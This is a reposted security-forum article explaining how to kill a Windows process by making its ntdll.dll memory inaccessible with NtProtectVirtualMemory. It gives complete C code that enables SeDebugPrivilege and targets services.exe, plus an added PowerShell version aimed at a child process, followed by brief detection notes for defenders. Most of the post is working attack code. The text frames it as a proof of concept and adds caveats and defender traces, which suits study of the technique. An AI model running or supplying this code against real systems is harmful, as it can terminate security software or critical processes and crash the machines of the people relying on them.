
[Repost] Terminating a process with NtProtectVirtualMemory

Posted: 2015-01-07 12:59:44


Title  : [Original] Terminating a process with NtProtectVirtualMemory
Author : KiDebug
Date   : 2011-07-13, 09:37:08
Link   : http://bbs.pediy.com/showthread.php?t=137067
 
The idea is simple: open the target process with PROCESS_VM_OPERATION (PROCESS_ALL_ACCESS is unnecessary) and set the pages of the target's ntdll.dll to PAGE_NOACCESS. Every user-mode thread runs through ntdll (the system-call stubs, the exception dispatcher, the APC dispatcher), so the next time any thread of the target returns into or calls into ntdll it faults; because the user-mode exception dispatcher is itself inside the now-inaccessible image, the fault cannot be delivered and the kernel terminates the process with STATUS_ACCESS_VIOLATION. Two things the code below relies on: RtlAdjustPrivilege(20, ...) enables SeDebugPrivilege (privilege value 20), without which a system process such as services.exe cannot be opened at all, and the ntdll base and size are read from the caller's own process, which only matches the target when both have the same bitness (ntdll's load address is randomized once per boot and shared by every process of that bitness; a WoW64 process maps a different 32-bit ntdll). Two caveats: services.exe is a system-critical process, so killing it crashes the machine and the name should be treated as a proof of concept and pointed at something expendable when testing; and on Windows 8.1 and later, protected (PPL) processes refuse PROCESS_VM_OPERATION even to a caller holding SeDebugPrivilege, so the technique only reaches unprotected targets.
/*
 * [Author: KiDebug]
 * [Blog: http://hi.baidu.com/KiDebug/]
 *  If this fails to build in VC 6.0, search for "vc 6.0 unicode".
 *  (The W versions of the toolhelp/module APIs are used explicitly below so it
 *   also builds without UNICODE defined. winternl.h supplies NTSTATUS and
 *   NT_SUCCESS; on an SDK without it, use "typedef LONG NTSTATUS;" instead.)
 */
#include <stdio.h>
#include <string.h>
#include <Windows.h>
#include <winternl.h>
#include <Psapi.h>
#include <Tlhelp32.h>

#pragma comment(lib,"Psapi.lib")

/* Undocumented ntdll export: enables or disables a privilege in the current
   token by privilege value. 20 == SE_DEBUG_PRIVILEGE, needed to open system
   processes such as services.exe. */
typedef NTSTATUS(__stdcall *RtlAdjustPrivilege_)(
    ULONG Privilege,
    BOOLEAN Enable,
    BOOLEAN CurrentThread,
    PBOOLEAN Enabled
    );
RtlAdjustPrivilege_ RtlAdjustPrivilege = NULL;

/* The native system call behind VirtualProtectEx. BaseAddress and RegionSize
   are in/out and get rounded to page boundaries, so pass copies rather than
   the MODULEINFO fields (SizeOfImage is a DWORD, not a SIZE_T, which breaks
   on x64 if its address is passed as PSIZE_T). */
typedef NTSTATUS(__stdcall *NtProtectVirtualMemory_)(
    HANDLE ProcessHandle,
    PVOID *BaseAddress,
    PSIZE_T RegionSize,
    ULONG NewProtectWin32,
    PULONG OldProtect
    );
NtProtectVirtualMemory_ NtProtectVirtualMemory = NULL;

/* Returns the PID of the first process whose image name matches, or 0. */
ULONG GetPID(const WCHAR* proc)
{
    BOOL                working = 0;
    PROCESSENTRY32W     lppe = { 0 };
    ULONG               targetPid = 0;
    HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);

    /* CreateToolhelp32Snapshot returns INVALID_HANDLE_VALUE, not NULL, on failure */
    if (hSnapshot == INVALID_HANDLE_VALUE)
    {
        return 0;
    }

    lppe.dwSize = sizeof(lppe);
    working = Process32FirstW(hSnapshot, &lppe);
    while (working)
    {
        if (_wcsicmp(lppe.szExeFile, proc) == 0)
        {
            targetPid = lppe.th32ProcessID;
            break;
        }
        working = Process32NextW(hSnapshot, &lppe);
    }

    CloseHandle(hSnapshot);
    return targetPid;
}

int main(void)
{
    HMODULE     ntdll;
    MODULEINFO  ModuleInfo;
    BOOLEAN     Enabled;
    HANDLE      hProc;
    ULONG       pid;
    PVOID       Base;
    SIZE_T      RegionSize;
    ULONG       OldProtect;
    NTSTATUS    status;

    /* Base and size of ntdll in *this* process; a target of the same bitness
       maps ntdll at the same address. */
    ntdll = GetModuleHandleW(L"ntdll.dll");
    if (ntdll == NULL ||
        !GetModuleInformation(GetCurrentProcess(), ntdll, &ModuleInfo, sizeof(MODULEINFO)))
    {
        printf("GetModuleInformation failed: %lu\n", GetLastError());
        return 1;
    }

    RtlAdjustPrivilege = (RtlAdjustPrivilege_)GetProcAddress(ntdll, "RtlAdjustPrivilege");
    NtProtectVirtualMemory = (NtProtectVirtualMemory_)GetProcAddress(ntdll, "NtProtectVirtualMemory");
    if (RtlAdjustPrivilege == NULL || NtProtectVirtualMemory == NULL)
    {
        printf("GetProcAddress on ntdll failed\n");
        return 1;
    }

    /* SeDebugPrivilege (value 20); only succeeds if the token holds it */
    RtlAdjustPrivilege(20, TRUE, FALSE, &Enabled);

    /* Target of the original post. services.exe is system-critical: killing it
       crashes the machine, so change this name when testing. */
    pid = GetPID(L"services.exe");
    if (pid == 0)
    {
        printf("target process not found\n");
        return 1;
    }

    /* PROCESS_VM_OPERATION is the only right NtProtectVirtualMemory needs */
    hProc = OpenProcess(PROCESS_VM_OPERATION, FALSE, pid);
    if (hProc == NULL)
    {
        printf("OpenProcess(%lu) failed: %lu\n", pid, GetLastError());
        return 1;
    }

    Base = ModuleInfo.lpBaseOfDll;
    RegionSize = ModuleInfo.SizeOfImage;
    status = NtProtectVirtualMemory(hProc, &Base, &RegionSize, PAGE_NOACCESS, &OldProtect);
    printf("NtProtectVirtualMemory on pid %lu: status 0x%08lX (old protection 0x%lX)\n",
           pid, (ULONG)status, OldProtect);

    CloseHandle(hProc);
    return NT_SUCCESS(status) ? 0 : 1;
}
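The same technique as an added PowerShell example (this is not KiDebug's code and not part of the original post): it uses the documented VirtualProtectEx wrapper, which is the Win32 front end of NtProtectVirtualMemory, against an expendable process the script starts itself, and it reads the target's ntdll base and size from the target's own module list instead of assuming they equal the caller's. It then waits for the target and reports the exit status, which is how the effect described above can be observed safely. Assumptions: a 64-bit PowerShell session and a 64-bit target (same bitness), ping.exe present under System32, and PowerShell 5 or later for the `[UIntPtr]::new` syntax; the Native class name and the 5-second timeout are this example's own choices.

```powershell
# Added example, not the original post's code. Terminates a child process by
# making its ntdll.dll image PAGE_NOACCESS through the documented VirtualProtectEx.
$code = @'
using System;
using System.Runtime.InteropServices;
public static class Native {
    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern IntPtr OpenProcess(uint dwDesiredAccess, bool bInheritHandle, uint dwProcessId);
    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern bool VirtualProtectEx(IntPtr hProcess, IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern bool CloseHandle(IntPtr hObject);
}
'@
Add-Type -TypeDefinition $code

$PROCESS_VM_OPERATION = 0x0008   # the only access right the protection change needs
$PAGE_NOACCESS        = 0x01

# Expendable target (assumption of this example): 'ping -t' wakes up every second,
# so one of its threads returns into an ntdll syscall stub right after the change.
$target = Start-Process -FilePath "$env:SystemRoot\System32\ping.exe" `
    -ArgumentList '-t','127.0.0.1' -WindowStyle Hidden -PassThru
Start-Sleep -Milliseconds 500
$targetPid = $target.Id

# Take ntdll's base/size from the target itself. For same-bitness processes it
# equals our own ntdll, but reading it from the target makes that explicit.
$ntdll = $target.Modules | Where-Object { $_.ModuleName -ieq 'ntdll.dll' }
if (-not $ntdll) { throw "ntdll.dll not found in module list of PID $targetPid" }
'PID {0}: ntdll at 0x{1:X} size 0x{2:X}' -f $targetPid, $ntdll.BaseAddress.ToInt64(), $ntdll.ModuleMemorySize

$h = [Native]::OpenProcess($PROCESS_VM_OPERATION, $false, $targetPid)
if ($h -eq [IntPtr]::Zero) {
    throw ('OpenProcess failed: {0}' -f [Runtime.InteropServices.Marshal]::GetLastWin32Error())
}

# VirtualProtectEx calls NtProtectVirtualMemory; the whole image range is one
# VAD, so a single call covers every section of ntdll.
$old = [uint32]0
$ok = [Native]::VirtualProtectEx($h, $ntdll.BaseAddress,
        [UIntPtr]::new([uint64]$ntdll.ModuleMemorySize), $PAGE_NOACCESS, [ref]$old)
$err = [Runtime.InteropServices.Marshal]::GetLastWin32Error()
[void][Native]::CloseHandle($h)
if (-not $ok) { throw ('VirtualProtectEx failed: {0}' -f $err) }
'old protection of the first page: 0x{0:X}' -f $old

# The target dies when a thread faults inside ntdll and the kernel cannot reach
# the user-mode exception dispatcher (also in ntdll) to deliver the exception.
if ($target.WaitForExit(5000)) {
    'PID {0} exited with status 0x{1:X8}' -f $targetPid, $target.ExitCode
} else {
    'PID {0} is still alive after 5 s, killing it' -f $targetPid
    Stop-Process -Id $targetPid -Force
}
```

Run it from an ordinary (non-elevated) session: no privilege is needed because the target is the caller's own child; SeDebugPrivilege only matters for the system-process target in the original code. The reported exit status is normally STATUS_ACCESS_VIOLATION (0xC0000005). From the defender's side the two observable traces are the cross-process handle open carrying PROCESS_VM_OPERATION (0x0008) in the GrantedAccess of a Sysmon Event ID 10 (ProcessAccess) record, and a victim that exits with 0xC0000005 without ever receiving an exception in user mode.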

 


Original source: http://www.cnblogs.com/Lthis/p/4207966.html
